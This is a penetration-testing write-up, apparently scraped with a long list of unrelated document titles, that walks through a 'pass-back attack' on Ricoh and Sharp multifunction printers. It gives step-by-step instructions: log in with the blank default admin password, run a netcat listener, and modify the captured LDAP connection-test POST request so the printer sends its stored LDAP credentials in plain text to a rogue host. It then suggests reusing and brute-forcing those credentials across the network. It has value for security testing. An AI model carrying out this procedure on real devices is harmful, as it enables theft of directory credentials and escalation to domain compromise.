Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers

Similar documents
Using SAML for Single Sign-On in the SOA Software Platform

Security-Assessment.com White Paper Leveraging XSRF with Apache Web Server Compatibility with older browser feature and Java Applet

How To Set Up A Macintosh With A Cds And Cds On A Pc Or Macbook With A Domain Name On A Macbook (For A Pc) For A Domain Account (For An Ipad) For Free

Plunder Pillage & Print

FROM PRINTER TO PWND. Leveraging Multifunction Printers During Penetration Testing

DEPLOYMENT GUIDE Version 1.1. Deploying the BIG-IP LTM v10 with Citrix Presentation Server 4.5

HTTP Response Splitting

Windows XP Exchange Client Installation Instructions

Cyber Security Workshop Ethical Web Hacking

Authentication Methods

Setting up Sharp MX-Color Imagers for Inbound Fax Routing to or Network Folder

Alert Notification of Critical Results (ANCR) Public Domain Deployment Instructions

Creating Home Directories for Windows and Macintosh Computers

IIS, FTP Server and Windows

Server Security. Contents. Is Rumpus Secure? 2. Use Care When Creating User Accounts 2. Managing Passwords 3. Watch Out For Aliases 4

Customer Tips. Configuring Color Access on the WorkCentre 7328/7335/7345 using Windows Active Directory. for the user. Overview

How do I Install and Configure MS Remote Desktop for the Haas Terminal Server on my Mac?

Training module 2 Installing VMware View

Setting Up Scan to SMB on TaskALFA series MFP s.

SETTING UP REMOTE ACCESS ON EYEMAX PC BASED DVR.

Configuring Color Access on the WorkCentre 7120 Using Microsoft Active Directory Customer Tip

LBL Application Availability Infrastructure Unified Secure Reverse Proxy

How do I Install and Configure MS Remote Desktop for the Haas Terminal Server on my Mac?

Shellshock Security Patch for X86

Sentral servers provide a wide range of services to school networks.

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Barracuda Networks Web Application Firewall

Integrating LANGuardian with Active Directory

From a Finder window choose Applications (shown circled in red) and then double click the Tether icon (shown circled in green).

Wireless Setup for Windows 8

Livezilla How to Install on Shared Hosting By: Jon Manning

Svn.spamsvn110. QuickStart Guide to Authentication. WebTitan Version 5

VERALAB LDAP Configuration Guide

Remote Access Services Apple Macintosh - Installation Guide

Configuring User Identification via Active Directory

Virtual Appliance for VMware Server. Getting Started Guide. Revision Warning and Disclaimer

Active Directory Integration

Using Remote Web Workplace Version 1.01

Hallpass Instructions for Connecting to Mac with a Mac

Enterprise Apple Xserve Wiki and Blog using Active Directory. Table Of Contents. Prerequisites 1. Introduction 1

Scan to FTP White Paper Ricoh Americas Corporation May 2007

SchoolBooking SSO Integration Guide

SCADA Security. Enabling Integrated Windows Authentication For CitectSCADA Web Client. Applies To: CitectSCADA 6.xx and 7.xx VijeoCitect 6.xx and 7.

Preparing for GO!Enterprise MDM On-Demand Service

Working Together - Your Apple Mac and Microsoft Windows

Sentral servers provide a wide range of services to school networks.

Centralized Mac Home Directories On Windows Servers: Using Windows To Serve The Mac

Hosted Microsoft Exchange Client Setup & Guide Book

How to Enable LDAP Directory Services Authentication to Microsoft Active Directory in the HP cclass Onboard Administrator

SAML-Based SSO Solution

Professional Mailbox Software Setup Guide

Sharing files on Windows XP with Mac OS X clients

LDAP User Guide PowerSchool Premier 5.1 Student Information System

Setting up Citrix XenServer for 2X VirtualDesktopServer Manual

Using MailStore to Archive MDaemon

Hosted Microsoft Exchange Client Setup & Guide Book

Wireless Network Configuration Guide

S/Medicine Mac OS X Domain Binding Instructions

NETASQ ACTIVE DIRECTORY INTEGRATION

Section 4 Application Description - LDAP

Mac OS X Secure Wireless Setup Guide

ICSA Labs Web Application Firewall Certification Testing Report Web Application Firewall - Version 2.1 (Corrected) Radware Inc. AppWall V5.6.4.

Installation and Setup Guide

The question becomes, How does the competent Windows IT professional open up their print server to their Mac clients?

Managing Identities and Admin Access

Massey University Wireless Network Client Configuration Mac OS X

Quick Scan Features Setup Guide

Setting up Hyper-V for 2X VirtualDesktopServer Manual

How To - Implement Single Sign On Authentication with Active Directory

Step by Step Guide to implement SMS authentication to F5 Big-IP APM (Access Policy Manager)

Setting up Hyper-V for 2X VirtualDesktopServer Manual

USG40HE Content Filter Customization

Configuring Steel-Belted RADIUS Proxy to Send Group Attributes

Wazza s QuickStart 17. Leopard Server - Blogs & Wikis

i>clicker v7 Gradebook Integration: Blackboard Learn Instructor Guide

Connecting to Delta College Exchange services off-campus

Crowbar: New generation web application brute force attack tool

Active Directory 2008 Implementation. Version 6.410

Secure Outgoing Mail (SMTP) Setup Guide

WebSpy Vantage Ultimate 2.2 Web Module Administrators Guide

Advantage for Windows Copyright 2012 by The Advantage Software Company, Inc. All rights reserved. Client Portal blue Installation Guide v1.

E M A I L S E T - U P G U I D E

2X ApplicationServer & LoadBalancer Manual

Module 45 (More Web Hacking)

Freshservice Discovery Probe User Guide

6) Click the lock in the lower left corner of the Directory Utility Window and authenticate with the local administrator account s credentials.

Configuring and Using the TMM with LDAP / Active Directory

DEPLOYMENT GUIDE DEPLOYING THE BIG-IP LTM SYSTEM WITH CITRIX PRESENTATION SERVER 3.0 AND 4.5

Cyclope Internet Filtering Proxy. - Installation Guide -

Setting up VMware ESXi for 2X VirtualDesktopServer Manual

File Share Navigator Online 1

Basic Configuration. Key Operator Tools older products. Program/Change LDAP Server (page 3 of keyop tools) Use LDAP Server must be ON to work

Device Log Export ENGLISH

Configuring Active Directory Binding for OS X (10.4.x) within Miami Dade Schools

Presto User s Manual. Collobos Software Version Collobos Software, Inc!

How To Set Up A Xerox Econcierge Powered By Xerx Account

How To Use The Macintosh Pcounter On Pc Or Macintosh (For Pc) With A Pc Or Pc (For Mac) With An External Hard Drive With A Printer On Itunes) With The Powerpoint (For Windows) On A Pc

SMART Vantage. Installation guide

NSi Mobile Installation Guide. Version 6.2

SETUP AND OPERATION GUIDE CLOUD PRINT. Version 1.0. January KYOCERA Document Solutions UK

Transcription:

Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers By Deral (PercX) Heiland and Michael (omi) Belton Over the past year, one focus of the Foofus.NET team involves developing and testing attacks against a number of Multifunction Printer (MFP) devices. A primary goal of this research is to demonstrate the effect of trust relationships between devices that are generally considered benign, and critical systems such as Microsoft Windows Domains. One of the most interesting attacks developed during this project is what we refer to as a Pass-Back Attack. A Pass-Back Attack is an attack where we direct an MFP device into authenticating (LDAP or SMB authentication) against a rogue system rather than the expected server. In the following sections we will step through the entire process of a Pass-Back-Attack using a Ricoh Aficio MP 5001 as our target device. This attack has been found to work on a number of Ricoh or rebranded Ricoh systems. Additionally, this attack works against a large number of MFP devices manufactured by Sharp. We expect there are many other devices that this attack will work against. This attack will be performed using a web browser, Netcat and a web proxy. First, we need to create a rogue listener that will be used to capture the authentication process initiated from the MFP. This is a relatively easy problem to solve; we can simply setup a listener using Netcat. $ nc l 1389 In this attack we will use port 1389. If you re reading this, you re probably well aware that binding to a privileged port requires some form of administrative account such as root. We prefer non-privileged ports for this attack because they allow us to demonstrate how unprivileged access on one system can be used to gain privileged access to another system. A demonstration of this involves a scenario where you have remote (user-level) access to a device on a filtered subnet and are looking to gain more privileged access to a wider set of systems. Additionally, this approach highlights the fact that LDAP can be configured to authenticate against any software listening on any port. Next, we need a web proxy. Here we can use a proxy like Paros or Burp. Burp has proven itself as an incredibly useful tool for penetration testing, so that s what we ll be using in these examples. Burp s default settings work well at this stage of the attack. That said, at this point, it s generally useful to disable interception in the proxy configuration (Figure 1).

Figure 1: Burp's Intercept Configuration Next we need to gain access to the printer. To do this, use a web browser, configured to pass data through the Burp proxy, to connect to the Ricoh s HTTP server on port 80. Once the web page is loaded you will need to log in to the printer. Every Ricoh printer we have examined requires a password to gain access to the LDAP configuration pages. Don t worry though, we ve been focusing our penetration testing work on these devices for nearly 4 years and have yet to find a Ricoh printer that doesn t use the default passwords. In some cases we ll find them exposed to the public internet with default settings. It seems there s a general perception of, it s just a printer and common technical security controls are ignored. We will soon demonstrate why this can be fatal logic. The login process is quite simple; click the LOGIN in upper right hand corner of the MFP device s splash page. When the login page appears enter admin as the username, leave the password blank and click the login button (Figure 2). Nice and easy. As mentioned previously it s rare to find the default credentials changed on these devices. Figure 2: Authentication Now that we are authenticated to the MFP we will proceed to the Configuration page. In this example it can be selected from the column on the left hand side (Figure 3).

Figure 3: Select The Configuration Page Once selected, the browser will take us to the configuration page. Under the configuration page we select the LDAP Server setting, which is listed under Device Settings (Figure 4). Figure 4: LDAP Server Settings Once we are on the LDAP Server settings page we hope to find LDAP services configured and enabled. In this example we see that ACMECD01 is listed as the authenticating LDAP server (Figure 5). From here it s as simple as selecting the LDAP setting you wish to modify and clicking on Change.

Figure 5: LDAP Server Listing At this point we are on the settings page for LDAP Server 1. We advise taking some time to examine each of the available settings. The following are some of the most important settings for this attack: Server Name Port Number Authentication These are the settings we will manipulate to get the printer to authenticate against our rogue LDAP server on the port we choose. If successful, this will cause the MFP to pass the LDAP credentials to us in plain text. So lets double check to make sure everything is ready to go: Ensure Netcat is active and listening on port 1389 Configure your Burp proxy to intercept communications (Figure 6) Figure 6: Enable Burp's Intercept Option Looking at the LDAP server configuration page we see Connection Test. To the right of that we see a button labeled Start. The purpose of this feature is to validate that your LDAP setting are correct prior to placing them into production. We are going to leverage this functionality to have the printer send us the stored LDAP password. When we first identified this feature we were quite amused; It s especially handy from our perspective, in that we can execute this

attack without modifying the settings of our targeted device. We dislike making loud noises during an assessment. So lets go, click on the Start button and take a look at what the Burp proxy captured; we have identified the three most interesting items (Figure 7). Figure 7: HTTP POST Request POST /web/entry/en/websys/ldapserver/ldapserversetconfirmtest.cgi HTTP/1.1 Host: 10.80.105.45 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-us; rv:1.9.2.19) Gecko/20110707 Firefox/3.6.19 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://10.80.105.45/web/entry/en/websys/ldapserver/ldapservergetdetail.cgi Cookie: risessionid=203418976564538; cookieonoffchecker=on; wimsesid=95153191 Content-Type: application/x-www-form-urlencoded Content-Length: 1088 paramcontrol=input&urllang=en&urlprofile=entry&urlscheme=http&returnvalue=suc CESS&title=LDAP_SERVER&availability=nameonserverNameonsearchPointonportNumons slonauthonusernameonpasswordonkerberosonconnecttestonsearchnameonmailaddresso nfaxnumoncompanynameonpostnameonoptionalsearchconditionon&authinfo=false&ldap ServerNumSelectedOut=1&entryNameOut=ACMECD01&serverNameOut=10.80.105.200&sear chpointout=dc%3dacme&portnumout=389&enablesslout=false&enableauthout=radio_no _AUTHRADIO_PLAIN_AUTH_ONRADIO_DIGEST_AUTH_ONRADIO_KERBEROS_ONRADIO_PLAIN_AUTH _ON&userNameOut=LDAPAdmin&isRealmKeyNameOut=11111&realmNameOut=UA_NOT_LOGINUA _NOT_LOGINUA_NOT_LOGINUA_NOT_LOGINUA_NOT_LOGIN0&searchNameOut=cn&searchMlAddO ut=mail&searchfaxnumout=facsimiletelephonenumber&searchcompanynameout=o&searc hpostnameout=ou&searchattrout=&searchkeyout=&entryname=acmecd01&servername=10.80.105.200&searchpoint=dc%3dacme&portnum=389&enablessl=false&enableauth=radi O_PLAIN_AUTH_ON&userName=LDAPAdmin&searchName=cn&searchMlAdd=mail&searchFaxNu m=facsimiletelephonenumber&searchcompanyname=o&searchpostname=ou&searchattr=& searchkey= It s important to note that you should not alter any of the POST data that contains Out within its variable name. During testing we have discovered that altering variables containing Out will reconfigure the MFP. This runs counter to our goal of extracting data without altering the MFP device s settings. Ok its time to extract the LDAP password. As part of the next step make the following changes to the POST data captured by the Burp proxy. Change the servername variable to match the rogue server s IP address: servername=10.80.105.100 Set the portnum variable to the port number Netcat is listening on: portnum=1389

Ensure the enableauth variable is set to RADIO_PLAIN_AUTH_ON: enableauth=radio_plain_auth_on Setting the enableauth variable to RADIO_PLAIN_AUTH_ON causes the MFP to transmit the authentication data in the clear. Next, we send our modified request to the MFP device by clicking the forward button in Burp. This will send our altered post data to the Ricoh MFP device. Figure 8: Send The Modified Request To The MFP Device At this point the Ricoh MFP device will attach to the rogue server s Netcat listener and pass the LDAP server username and password in plain text. In some instances, we have measured a delay of up to 1 ½ minutes after the MFP connects to the listener, before the username and password are actually sent. Be patient. As can be seen in the following image (Figure 9), the Netcat listener captured the authentication credentials configured for Ricoh s LDAP server. In this example, the plain text password of R17$wdG is being used.

Figure 9: Credentials Received From The MFP Device From here the most obvious step would be to use our newly acquired credentials to authenticate against a legitimate LDAP server in the target network. If the LDAP server is a Windows Active Directory Controller it is possible that we now have Domain Administrator rights. At the very least, it is highly probable that the acquired credentials are associated with a privileged account. Beyond testing against a single server, it s useful to consider utilizing bruteforcing software I recommend Medusa (http://medusa.foofus.net/) as a way of identifying the extent to which the acquired credentials can be used against all other systems in the target network.